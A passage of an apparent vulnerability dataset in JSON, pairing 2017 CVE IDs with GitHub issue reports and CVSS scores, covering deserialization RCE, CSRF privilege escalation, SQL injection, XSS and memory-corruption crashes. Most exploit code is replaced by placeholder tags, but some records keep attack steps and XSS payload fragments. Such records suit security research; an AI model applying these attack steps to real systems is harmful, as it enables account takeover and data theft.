        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7525",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1599",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1599",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2017-04-11T12:39:46Z",
        "description": "Jackson Deserializer vulnerability, can execute any code or command. Jackson Deserializer vulnerability, can execute any code or command The trigger condition of vulnerability is APITAG deserialization before the call to the APITAG method, this method allows the class name specified deserialize Java objects in the JSON string, the use of Object, Map, List and other objects, will cause the deserialization of vulnerabilities. Please refer to POC, the POC is a eclipse project under the Maven. POC command is in MAC or Windows pop up calculator POC verification of various cases list: PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG You only need to do the following code to trigger the vulnerability: APITAG mapper = new APITAG (); / / you must call the APITAG method APITAG (); APITAG (\"JSON string specified\", APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-7525",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1723",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1723",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2017-08-04T08:06:36Z",
        "description": "CVETAG jackson databind: Deserialization vulnerability via APITAG method of APITAG There is this vulnerability ( CVETAG , CVETAG in jackson databind that allows remote code execution. I tried to check existing issues but could not find anything related. This vulnerability has been reported in NUMBERTAG as well as all pre releases of NUMBERTAG Is this actually fixed in NUMBERTAG or is there a patch release planned?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-7550",
        "Issue_Url_old": "https://github.com/ansible/ansible/issues/30874",
        "Issue_Url_new": "https://github.com/ansible/ansible/issues/30874",
        "Repo_new": "ansible/ansible",
        "Issue_Created_At": "2017-09-25T19:26:18Z",
        "description": "jenkins_plugin \"params\" argument is insecure. ISSUE TYPE Bug Report COMPONENT NAME PATHTAG ANSIBLE VERSION APITAG CONFIGURATION N/A OS / ENVIRONMENT N/A SUMMARY It was noticed that using the jenkins_plugin with username and password would log the password on the remote host. After some digging I discovered that in addition to the normal url_username and url_password arguments for APITAG the jenkins_plugin module also has a params argument where arbitrary ansible module arguments can be given. This parameter should go away as it circumvents all the normal argument checking, validation, and normalization. For url_password, this is bad as using param to send in the url_password instead of the specific url_password argument allows the url_password to be logged. This can be a security problem. I also found the source of the user's use of param instead of url_username and url_password: the module documentation has an example of using param that has that in it. STEPS TO FIX I am going to immediately create and merge a PR to remove the param example and replace it with using the url_username and url_password arguments directly. The params argument should also be removed (as it bypasses the no_log setting on url_password, allowing the password to be logged by mistake). Additional parameters that the module uses should be explicitly stated in the argument_spec instead. (I took a look at the module and it does not appear that params is passed directly to the jenkins server, instead, specific keys are always plucked out of the params. So there should be no problem removing params.)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-7571",
        "Issue_Url_old": "https://github.com/ladybirdweb/faveo-helpdesk/issues/446",
        "Issue_Url_new": "https://github.com/ladybirdweb/faveo-helpdesk/issues/446",
        "Repo_new": "ladybirdweb/faveo-helpdesk",
        "Issue_Created_At": "2017-04-05T03:28:18Z",
        "description": "CSRF Privilege Escalation APITAG of Role Agent to Admin) Vulnerability on Faveo version Community NUMBERTAG Exploit Title : CSRF Privilege Escalation APITAG of Role Agent to Admin) Vulnerability on Faveo version Community NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author : MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG Vendor Homepage : FILETAG Software Link : FILETAG Version : Community NUMBERTAG Tested on : Windows Server NUMBERTAG Datacenter Evaluation CVSS PATHTAG NUMBERTAG HIGH) I. Background: Faveo Helpdesk Open source ticketing system build on Laravel framework. Faveo word is derived from Latin which means to be favourable. Which truly highlights vision and the scope as well as the functionality of the product that Faveo is. It is specifically designed to cater the needs of startups and SME's empowering them with state of art, ticket based support system. In today's competitive startup scenario customer retention is one of the major challenges. Handling client query diligently is all the difference between retaining or losing a long lasting relationship. II. Description: Cross Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. Faveo have roles: user APITAG access backend) agent APITAG access backend but limited) admin APITAG full access backend) III. Exploit: CSRF Target is: PATHTAG user id NUMBERTAG role is agent) We have low privilege as \u201cagent\u201d to access application, and then want to change be admin role. Make sample our script of CSRF APITAG CODETAG Before running APITAG please login your account as agent and running your html script. Yeaaah, now user id NUMBERTAG become admin privilege ^_^ Refer: URLTAG URLTAG > I attach our screenshot and script CSRF: APITAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.0,
        "impactScore": 5.9,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2017-7578",
        "Issue_Url_old": "https://github.com/libming/libming/issues/68",
        "Issue_Url_new": "https://github.com/libming/libming/issues/68",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2017-03-21T10:37:48Z",
        "description": "Heap overflows in parser.c. Dear all, The following bugs were found with AFLGo, a directed version of the fuzzer AFL / APITAG Thanks also to Van Thuan Pham. This issues are related to NUMBERTAG The Libming utility listswf crashes due to a heap based buffer overflow in the function APITAG and several other functions in parser.c. APITAG flags them as invalid writes \"of size NUMBERTAG but the heap can be actually be written to multiple times (e.g., in each line of APITAG NUMBERTAG The overflows are caused by a pointer behind the bounds of a statically allocated array of structs of type SWF_GRADIENTRECORD. Sample crash inducing input: FILETAG ERRORTAG The bugs are fixed by the following patch (preventing the pointer behind the array bounds): CODETAG Best regards, Marcel Marcel B\u00f6hme Senior Research Fellow TSUNAMi Research Centre National University of Singapore",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7623",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/12",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/12",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2017-04-03T06:08:47Z",
        "description": "heap buffer overflow in iwmiffr_convert_row NUMBERTAG on APITAG NUMBERTAG imagew $FILE FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG daae bp NUMBERTAG ffc NUMBERTAG d NUMBERTAG sp NUMBERTAG ffc NUMBERTAG d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG daad in iwmiffr_convert_row NUMBERTAG PATHTAG NUMBERTAG a1c5 in iwmiff_read_pixels PATHTAG NUMBERTAG d8 in iw_read_miff_file PATHTAG NUMBERTAG be8 in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG fdcb NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG bbeb in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG e0c8d in calloc PATHTAG NUMBERTAG b NUMBERTAG in my_mallocfn PATHTAG NUMBERTAG aa NUMBERTAG a in iw_malloc_ex PATHTAG NUMBERTAG aa3e3 in iw_mallocz PATHTAG NUMBERTAG d NUMBERTAG in iwmiff_read_pixels PATHTAG NUMBERTAG d8 in iw_read_miff_file PATHTAG NUMBERTAG be8 in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG fdcb NUMBERTAG b NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG heap buffer overflow PATHTAG in iwmiffr_convert_row NUMBERTAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fb NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7624",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/10",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/10",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2017-04-03T06:07:55Z",
        "description": "memory leak in imagew cmd. on APITAG NUMBERTAG imagew $FILE FILETAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG e0ad6 in malloc PATHTAG NUMBERTAG b7b in my_mallocfn PATHTAG NUMBERTAG aa NUMBERTAG a in iw_malloc_ex PATHTAG NUMBERTAG aa NUMBERTAG a in iw_malloc_large PATHTAG NUMBERTAG ffe4 in bmpr_read_uncompressed PATHTAG NUMBERTAG be in iwbmp_read_bits PATHTAG NUMBERTAG e8 in iw_read_bmp_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG fc NUMBERTAG fb NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7649",
        "Issue_Url_old": "https://github.com/eclipse/kura/issues/956",
        "Issue_Url_new": "https://github.com/eclipse/kura/issues/956",
        "Repo_new": "eclipse/kura",
        "Issue_Created_At": "2016-12-16T18:03:33Z",
        "description": "APITAG Kura firewall rules bypassed with IP NUMBERTAG The firewall rules set by Kura can be bypassed using IP NUMBERTAG The Kura install scripts, for installers that include network management, should disable IP NUMBERTAG on the host system. We will remove this once we add proper support to IP NUMBERTAG in Kura.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-7694",
        "Issue_Url_old": "https://github.com/symphonycms/symphony-2/issues/2655",
        "Issue_Url_new": "https://github.com/symphonycms/symphonycms/issues/2655",
        "Repo_new": "symphonycms/symphonycms",
        "Issue_Created_At": "2017-04-07T21:49:25Z",
        "description": "security bug Reported.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7695",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/276",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/276",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-04-07T07:52:13Z",
        "description": "Unrestricted File Upload Reported. Exploit Title: Unrestricted File Upload Vulnerability Type: Accessing, Modifying or Executing Executable Files (CAPEC NUMBERTAG Reporting Date NUMBERTAG Author: MENTIONTAG Vendor Homepage: FILETAG Software Link: URLTAG Version NUMBERTAG I. Abstract APITAG CMS is publicly licensed under the GNU Lesser General Public License It is an open source content management system built on PHP and APITAG II. Introduction NUMBERTAG Accessing, Modifying or Executing Executable Files An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface NUMBERTAG ulnerability analysis for bigtree cms At the file PATHTAG line NUMBERTAG The code of Regular expression shows that i could be bypassed by upload a file Name APITAG var APITAG = PATHTAG APITAG Then the attacker could get a webshell by using this method III. References NUMBERTAG CAPEC NUMBERTAG CVETAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-7697",
        "Issue_Url_old": "https://github.com/erikd/libsamplerate/issues/11",
        "Issue_Url_new": "https://github.com/libsndfile/libsamplerate/issues/11",
        "Repo_new": "libsndfile/libsamplerate",
        "Issue_Created_At": "2017-04-11T09:11:28Z",
        "description": "global buffer overflow in calc_output_single (src_sinc.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7716",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/7260",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7260",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-04-12T11:33:52Z",
        "description": "Heap out of bounds read in APITAG Heap out of bounds read in APITAG Tested on Git HEAD: APITAG Payload: URLTAG Command: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7854",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/7265",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7265",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-04-13T11:01:41Z",
        "description": "Heap out of bounds read in APITAG Heap out of bounds read in APITAG Tested on Git HEAD: APITAG Payload: radare/radare2 regressions NUMBERTAG Command: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7871",
        "Issue_Url_old": "https://github.com/trollepierre/tdm/issues/50",
        "Issue_Url_new": "https://github.com/trollepierre/tdm/issues/50",
        "Repo_new": "trollepierre/tdm",
        "Issue_Created_At": "2017-03-24T05:14:54Z",
        "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability. The vulnerability exists due to insufficient filtration of user supplied data in \"challenge\" HTTP parameter that will be passed to \"tdm APITAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7877",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/27",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/27",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2017-04-08T04:40:49Z",
        "description": "CSRF Privilege Escalation APITAG of an administrator account) on APITAG NUMBERTAG Exploit Title: CSRF Privilege Escalation APITAG of an administrator account) on APITAG NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author: MENTIONTAG Software Link: FILETAG Version NUMBERTAG Description: Using Cross Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background. In the case of APITAG we can use CSRF to perform actions on the admin dashboard by targeting an administrator. Exploit: We assume that APITAG is installed at APITAG . Our target is APITAG which is the page used to create a new user. The given POC will create a user on the website which has full administrator privileges. CODETAG Before running the POC, make sure you are logged in into an administrator account. Then open the HTML file and submit the form. The new user with admin rights should now have been created. References: URLTAG URLTAG Screenshots: Before the exploit FILETAG Exploit Page FILETAG After submitting the form FILETAG New user added FILETAG With admin access FILETAG Impact: Compromises the entire web application and user data Mitigation: Use of CSRF tokens Creation of a user account was just an example. Other pages/settings in the admin dashboard are also vulnerable to CSRF. For example, the APITAG Headers (HTML)_ features can be misused to inject JS into the website.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7878",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/29",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/29",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2017-04-11T15:48:28Z",
        "description": "SQL Injection vulnerability APITAG DB) on APITAG NUMBERTAG Exploit Title: SQL Injection vulnerability APITAG DB) on APITAG NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author: MENTIONTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Exploit: The vulnerability is due to a non parameterized SQL query at URLTAG This vulnerability along with missing validation on the email field of the registration and password reset forms can be used to create an administrator account with full privileges. We assume that APITAG is installed at APITAG and new registrations are enabled NUMBERTAG Go to APITAG . Fill in the username ERRORTAG and some password. Fill in the email fields as ERRORTAG . This step is required since the password reset form checks for valid emails in the DB before reset NUMBERTAG Since the register page uses parameterized query, the whole email string will be stored in the DB NUMBERTAG Now go to APITAG and put in the email address mentioned while registering. Due to URLTAG the query will effectively become ERRORTAG NUMBERTAG As you can see, this will set administrator as the user class for now newly created user ERRORTAG and will also give it permissions to manage the user management screen NUMBERTAG Once inside the admin panel, the attacker can give himself extra privileges. References: URLTAG Screenshots: Registration Form FILETAG Password Reset FILETAG New user created and verified with ability to edit users FILETAG Logged in as new user and change privileges FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation on email fields",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-7879",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/28",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/28",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2017-04-11T07:17:33Z",
        "description": "SQL Injection vulnerability APITAG DB) on APITAG NUMBERTAG Exploit Title: SQL Injection vulnerability APITAG DB) on APITAG NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author: MENTIONTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Exploit: The vulnerability is due to a non parameterized SQL query at URLTAG and a few following lines. We assume that APITAG is installed at APITAG . The exploit URL is APITAG . This effectively results in the following query to be executed APITAG which allows an unauthenticated user to be able to view all ghost/invisible pages without having links to them. The exploit URL can also be possibly modified to leak the content database using UNION based SQL injection attacks. References: URLTAG Screenshots: Viewing ghost pages FILETAG Impact: Read data from the content database Mitigation: Use of Parameterized SQL Queries",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-7891",
        "Issue_Url_old": "https://github.com/sbpp/sourcebans-pp/issues/253",
        "Issue_Url_new": "https://github.com/sbpp/sourcebans-pp/issues/253",
        "Repo_new": "sbpp/sourcebans-pp",
        "Issue_Created_At": "2017-04-13T08:45:50Z",
        "description": "XSS vulnerability in FILETAG . There is a reflective XSS vulnerability in the NUMBERTAG line of the FILETAG file. Hackers can exploit this vulnerability to obtain an administrator's cookies. URLTAG \"); APITAG APITAG APITAG APITAG alert(\"a Effect in browser: FILETAG FILETAG code: FILETAG Do not print the user input data directly on the page. Please. My English is so poor. Could you help me apply for a CVE number for this vulnerability? I need it. Thank you very much\u3002 Version used NUMBERTAG PHP and APITAG version: APITAG mysql5 Operating System and version: windows NUMBERTAG Link to your project:localhost",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7939",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/13",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/13",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2017-04-08T17:19:17Z",
        "description": "stack buffer overflow in read_next_pam_token. on APITAG NUMBERTAG imagew $FILE FILETAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd NUMBERTAG d NUMBERTAG a4 at pc NUMBERTAG c bp NUMBERTAG ffd NUMBERTAG d NUMBERTAG f NUMBERTAG sp NUMBERTAG ffd NUMBERTAG d NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffd NUMBERTAG d NUMBERTAG a4 thread T NUMBERTAG b in read_next_pam_token src/imagew APITAG NUMBERTAG a7c in iwpnm_read_pam_header src/imagew APITAG NUMBERTAG aa in iwpnm_read_header src/imagew APITAG NUMBERTAG e in iw_read_pnm_file src/imagew APITAG NUMBERTAG f in iw_read_pam_file src/imagew APITAG NUMBERTAG b2a6 in iw_read_file_by_fmt src/imagew APITAG NUMBERTAG in iwcmd_run src/imagew APITAG NUMBERTAG bfb in iwcmd_main src/imagew APITAG NUMBERTAG cde in main src/imagew APITAG NUMBERTAG fb NUMBERTAG f NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG PATHTAG ) Address NUMBERTAG ffd NUMBERTAG d NUMBERTAG a4 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a5 in iwpnm_read_pam_header src/imagew APITAG This frame has NUMBERTAG object(s NUMBERTAG curpos NUMBERTAG linebuf' APITAG NUMBERTAG ab NUMBERTAG f4 f4 f4 f2 f2 f2 f NUMBERTAG ab NUMBERTAG f4 f4 f4 f2 f2 f2 f NUMBERTAG ab NUMBERTAG f4 f4 f NUMBERTAG ab NUMBERTAG f3 f3 f3 f NUMBERTAG ab NUMBERTAG f1 f1 f1 f NUMBERTAG f4 f4 f4 f3 f3 f3 f NUMBERTAG ab NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7940",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/18",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/18",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2017-04-17T14:50:49Z",
        "description": "memory leak in imagew cmd. on APITAG NUMBERTAG imagew $FILE out.pnm APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f1ac NUMBERTAG dbb8 in __interceptor_malloc PATHTAG NUMBERTAG ERRORTAG b NUMBERTAG in my_mallocfn src/imagew APITAG NUMBERTAG a NUMBERTAG c in iw_malloc_ex src/imagew APITAG NUMBERTAG a8a7 in iw_malloc_large src/imagew APITAG NUMBERTAG f NUMBERTAG in iwgif_init_screen src/imagew APITAG NUMBERTAG d7 in iwgif_read_image src/imagew APITAG NUMBERTAG in iwgif_read_main src/imagew APITAG NUMBERTAG cde in iw_read_gif_file src/imagew APITAG NUMBERTAG b NUMBERTAG in iw_read_file_by_fmt src/imagew APITAG NUMBERTAG in iwcmd_run src/imagew APITAG NUMBERTAG bfb in iwcmd_main src/imagew APITAG NUMBERTAG cde in main src/imagew APITAG NUMBERTAG f1ac NUMBERTAG b NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7941",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/428",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/428",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-17T15:34:24Z",
